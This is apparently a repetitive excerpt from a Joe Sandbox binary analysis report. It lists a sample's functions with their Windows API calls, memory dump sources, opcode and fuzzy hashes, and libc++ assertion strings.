                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                        • API String ID: 1646373207-706389432
                                                                                                                        • Opcode ID: afea8cbbbb29af8f8a65266dd0d40ae631b44b655202e28b5dab8aa0514eb11c
                                                                                                                        • Instruction ID: 689c2e7e31511c5cd20734fad5a22b63c7e8fb16cd86af641cabc46adb176655
                                                                                                                        • Opcode Fuzzy Hash: afea8cbbbb29af8f8a65266dd0d40ae631b44b655202e28b5dab8aa0514eb11c
                                                                                                                        • Instruction Fuzzy Hash: CED012306AC3049BC600BFE7BC09D15776CEA5571A3008415FC0CC2261EFB0D4006F50
                                                                                                                        Function 0596A2A4 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e2e113a31e7206689e99cb9e3f8a5aa9fab270fba3d520fb0f91db4a2b51985d
                                                                                                                        • Instruction ID: 295cdf23544b400d2ee7032dafe5bafdd3bbffdf0894043fa305ec7804faf6ef
                                                                                                                        • Opcode Fuzzy Hash: e2e113a31e7206689e99cb9e3f8a5aa9fab270fba3d520fb0f91db4a2b51985d
                                                                                                                        • Instruction Fuzzy Hash: EF024A71E01219DBDF14CFA8C984AAEBBF5FF88314F248269D919B7340D731AA45CB90
                                                                                                                        Function 008A0B30 Relevance: 6.4, APIs: 4, Instructions: 364COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,-00000001,?,?,?,0089EF51,00000065,?,?,00000000), ref: 008A0BC9
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,-00000001,?,?,?,0089EF51,00000065,?,?,00000000), ref: 008A0D71
                                                                                                                          • Part of subcall function 0089FB70: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0089FBEC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentDirectoryRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 904961151-0
                                                                                                                        • Opcode ID: dfef3128f9ba98c4ed56ab5a7195381f84dd1cd9a485a1152165da6fd83ffa7d
                                                                                                                        • Instruction ID: 05d55b2d7296427bbd825f0eb7d3178b52476d29438a4ed8925426d0c8e8dcd8
                                                                                                                        • Opcode Fuzzy Hash: dfef3128f9ba98c4ed56ab5a7195381f84dd1cd9a485a1152165da6fd83ffa7d
                                                                                                                        • Instruction Fuzzy Hash: A2C1B471F016099BEF14DF98D881AAEB7B2FF86314F188129E805EB741DB31AD46CB51
                                                                                                                        Function 009002E4 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 009002F0
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 009003BC
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009003DC
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 009003E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 254469556-0
                                                                                                                        • Opcode ID: c30b93f59c3aa5842c6f2380cb6ddfab6acfb5309d6a7afa028bf5a0c776a350
                                                                                                                        • Instruction ID: bd41b040d3dda250cca3478148f4fd3f8b42b53f36b0a8d8800b65475e93cb2a
                                                                                                                        • Opcode Fuzzy Hash: c30b93f59c3aa5842c6f2380cb6ddfab6acfb5309d6a7afa028bf5a0c776a350
                                                                                                                        • Instruction Fuzzy Hash: 7B310775D5531D9FDF11EFA4D9897CDBBB8AF48300F1041AAE40DAB290EB705A848F44
                                                                                                                        Function 008C8DE0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 008C8E45
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 008C8EAA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireRelease
                                                                                                                        • String ID: MZx
                                                                                                                        • API String ID: 17069307-2575928145
                                                                                                                        • Opcode ID: 38f951f3617cf1f0368a9a6131350ef475552ccca4962e86c9801a353f4a1036
                                                                                                                        • Instruction ID: 2d68ba702f09733fca8c023f24ce9776b7977c439dfa793ac1efc35e07ba6bec
                                                                                                                        • Opcode Fuzzy Hash: 38f951f3617cf1f0368a9a6131350ef475552ccca4962e86c9801a353f4a1036
                                                                                                                        • Instruction Fuzzy Hash: FF519E72E64609CBCB14CE99D841BAEB7B6FB88324F18812DE505EB345DF31ED418B91
                                                                                                                        Function 009007FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00900810
                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 0090082B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoQuerySystemVirtual
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 401686933-2746444292
                                                                                                                        • Opcode ID: 4370428e8dc902d0f549dc5b7c093f8a87338ee4b3557be5732263a94eebbb8d
                                                                                                                        • Instruction ID: 2c62b227c6ad49797e33484d73c9aa50dc51d90dd5acc1fe7536bc54ea26752b
                                                                                                                        • Opcode Fuzzy Hash: 4370428e8dc902d0f549dc5b7c093f8a87338ee4b3557be5732263a94eebbb8d
                                                                                                                        • Instruction Fuzzy Hash: 31018472A00209AFDB14DE29DC05BEE7BADAFC4325F09C225AD59D7295EA34D941CAC0
                                                                                                                        Function 00870C80 Relevance: 5.0, APIs: 3, Instructions: 535COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldiv
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3732870572-0
                                                                                                                        • Opcode ID: 5c729f36e4ecaf77eefd001a93e89cb39bd6a4eb122de4a27d8e4f7d4a517b0e
                                                                                                                        • Instruction ID: ccdd2a2ff945950afa90c8eb7dd3a8fb719404e3714468f5a20df315bdd0d404
                                                                                                                        • Opcode Fuzzy Hash: 5c729f36e4ecaf77eefd001a93e89cb39bd6a4eb122de4a27d8e4f7d4a517b0e
                                                                                                                        • Instruction Fuzzy Hash: 2D226B71A002099FCB18CF58C484AADB7F6FF88314B15C569E549EB3A5DB70AD44CFA4
                                                                                                                        Function 00922A00 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0091DF1A: GetLastError.KERNEL32(00000000,?,0091AB09), ref: 0091DF1E
                                                                                                                          • Part of subcall function 0091DF1A: SetLastError.KERNEL32(00000000,?,?,00000028,00914B7E), ref: 0091DFC0
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00922A54
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00922A9E
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00922B64
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 661929714-0
                                                                                                                        • Opcode ID: 9b1d9a0940df865ec2eea3f7695a50792440f14c1cee27bd0d760236fbfd85ad
                                                                                                                        • Instruction ID: 92955f7eb2a81f766b31cbd02992559ba69b263e822a631be8984864dea5d387
                                                                                                                        • Opcode Fuzzy Hash: 9b1d9a0940df865ec2eea3f7695a50792440f14c1cee27bd0d760236fbfd85ad
                                                                                                                        • Instruction Fuzzy Hash: D661B571A1022BAFDB28DF24DD82BBA73ACEF45300F2045BAED05C6589E774D981DB50
                                                                                                                        Function 008B63B0 Relevance: 4.7, APIs: 3, Instructions: 160COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00966B40,?,00000000,00000003,?,008B932E,00962588,?), ref: 008B64AE
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00966B40,?,00000000,00000003,?,008B932E,00962588,?), ref: 008B64D7
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008B6584
                                                                                                                          • Part of subcall function 008B6A20: _strlen.LIBCMT ref: 008B6A31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireInit_thread_headerRelease_strlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2474859000-0
                                                                                                                        • Opcode ID: cf8b23766e4ac4f9e7ae9a6de1848668b882d8633146101dee04c697181325d2
                                                                                                                        • Instruction ID: bc9bba679bd15b20f77f5370ba16271764b5d140b23b59b62de873b017e6cd40
                                                                                                                        • Opcode Fuzzy Hash: cf8b23766e4ac4f9e7ae9a6de1848668b882d8633146101dee04c697181325d2
                                                                                                                        • Instruction Fuzzy Hash: 51517C72A18218DBCB24DF78DC52AAAB7A1FB80318F14012DD806D7395EB75ED21C7C2
                                                                                                                        Function 008FACB0 Relevance: 4.3, Strings: 3, Instructions: 566COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008FB2E6
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008FB2D7
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008FB2C8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                                                                                        • API String ID: 0-2138987473
                                                                                                                        • Opcode ID: e50739581080df53a77a512d4d7dba5c87862e23c60f2b62e7f4418aff077c12
                                                                                                                        • Instruction ID: 963f4a6d762538fa83a16c5b8bacb4efe42a31796b6202ad4cc353598aab7d2d
                                                                                                                        • Opcode Fuzzy Hash: e50739581080df53a77a512d4d7dba5c87862e23c60f2b62e7f4418aff077c12
                                                                                                                        • Instruction Fuzzy Hash: 1C12E9B1B0021E8BCB18CF74C4906BA77A2FF84324F258569DA5ADB351DB31ED45C791
                                                                                                                        Function 008FA680 Relevance: 4.3, Strings: 3, Instructions: 536COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008FAC82
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008FAC91
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008FAC73
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                                                                                        • API String ID: 0-1360549270
                                                                                                                        • Opcode ID: da60f09b95c61567c445410a29bb7fbaf77846be8b2f93a393916eb549c59bc5
                                                                                                                        • Instruction ID: 620266a6e025588c21b42cdbd18f9e5f27d1d912f6aae0eeb3449e9b71f7790b
                                                                                                                        • Opcode Fuzzy Hash: da60f09b95c61567c445410a29bb7fbaf77846be8b2f93a393916eb549c59bc5
                                                                                                                        • Instruction Fuzzy Hash: 1602FAB1A0022A8FCB1C8E38C4907BA7BA1FB85364F298179DA5DDB381D6749D45C7D2
                                                                                                                        Function 008D6C70 Relevance: 3.2, APIs: 2, Instructions: 200COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,00000001,?,008AD1F0,?,008D50B1,00000001,?,?,008AC5DD,?,00000001,?), ref: 008D6D22
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,00000001,?,008AD1F0), ref: 008D6E57
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 17069307-0
                                                                                                                        • Opcode ID: dee89e350d34fd7559b6f8b82e6839e58ddb3622e30bbf2f30df7da3a433caf9
                                                                                                                        • Instruction ID: c9eb93e1a6f1a96774e2b64c3cb750c9d91a70d86444448b5a0c9946ed701d23
                                                                                                                        • Opcode Fuzzy Hash: dee89e350d34fd7559b6f8b82e6839e58ddb3622e30bbf2f30df7da3a433caf9
                                                                                                                        • Instruction Fuzzy Hash: 24610875F101098BCB149F6CDC4166EB7A7FB84710B288226E415EB351FB31DD118795
                                                                                                                        Function 008C8BE0 Relevance: 3.2, APIs: 2, Instructions: 181COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,008C8BDA,?,?), ref: 008C8C2E
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?), ref: 008C8D73
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 17069307-0
                                                                                                                        • Opcode ID: b229df2167aade141f5b9d3bfb3c7d25cd224756b00f40f6dbc3fd7cd9d3391b
                                                                                                                        • Instruction ID: 754238f9beebe8744acdfa60b4dee0c613b7948e28bfff060f1b8d2eb949962f
                                                                                                                        • Opcode Fuzzy Hash: b229df2167aade141f5b9d3bfb3c7d25cd224756b00f40f6dbc3fd7cd9d3391b
                                                                                                                        • Instruction Fuzzy Hash: A0519A71E512198BCB14DF59D840BAEB7B2FF98314F29812DE906EB241DB31ED018B92
                                                                                                                        Function 008567C0 Relevance: 3.0, Strings: 2, Instructions: 537COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string:3605: assertion __n2 == 0 || __s != nullptr failed: string::compare(): received nullptr, xrefs: 00856E40
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00856E39
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
